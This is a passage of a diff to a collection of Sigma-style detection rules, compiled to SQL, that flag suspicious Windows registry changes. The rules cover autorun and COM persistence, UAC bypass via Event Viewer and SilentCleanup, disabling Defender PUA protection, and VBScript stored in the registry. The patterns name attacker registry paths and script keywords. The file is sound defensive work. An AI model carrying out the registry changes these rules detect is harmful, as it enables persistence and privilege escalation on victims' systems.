TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewValue = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" ], - 
"filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" + "filename": "registry_set_asep_reg_keys_modification_classes.yml" }, { - "title": "Outlook Security Settings Updated - Registry", - "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", + "status": "experimental", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + ], + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + }, + { + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects changes to the registry values related to outlook security settings", - "author": "frack113", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1053.005" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": 
[ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_office_outlook_security_settings.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without 
prompting UAC", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND NewValue LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "title": "Add Debugger Entry To AeDebug For Persistence", + "id": "092af964-4233-4373-b4ba-d86ea2890288", "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate use of the key to setup a debugger. 
Which is often the case on developers machines" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\') AND NOT (NewValue LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_set_aedebug_persistence.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", "author": "frack113", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (NewValue LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "System Scripts Autorun Keys Modification", + "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry 
value modified' ESCAPE '\\') AND Channel = 'Security') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" }, { - "title": "Potential Persistence Via COM Search Order Hijacking", - "id": 
"a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "title": "VBScript Payload Stored in Registry", + "id": "46490193-1b22-4c29-bdd6-5bf63907216f", "status": "experimental", - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1547.001" ], "falsepositives": [ - "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR NewValue LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (NewValue LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((NewProcessName LIKE 
'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (NewValue LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((NewValue LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((NewValue LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewValue LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (NewValue LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND NewValue LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND 
(EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_search_order.yml" + "filename": "registry_set_vbs_payload_stored.yml" }, { - "title": "Potential Persistence Via Custom Protocol Handler", - "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", - "status": "experimental", - "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. 
And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WinSock2 Autorun Keys Modification", + "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate applications registering a new custom protocol handler" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND NewValue LIKE 'URL:%' ESCAPE '\\') AND NOT ((NewValue LIKE 'URL:ms-%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR NewProcessName LIKE 
'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_custom_protocol_handler.yml" + "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" }, { - "title": "Potential PowerShell Execution Policy Tampering", - "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", + "title": "Disabled RestrictedAdminMode For RDS", + "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (NewValue LIKE '%Bypass%' ESCAPE '\\' OR NewValue LIKE '%RemoteSigned%' ESCAPE '\\' OR NewValue LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND 
EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "registry_set_powershell_execution_policy.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", + "title": "Change User Account Associated with the FAX Service", + "id": "e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (NewValue LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Scheduled TaskCache Change by 
Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", - "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "title": "Enable Microsoft Dynamic Data Exchange", + "id": "63647769-326d-4dde-a419-b925cc0caf42", + "status": "test", + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.execution", + "attack.t1559.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows 
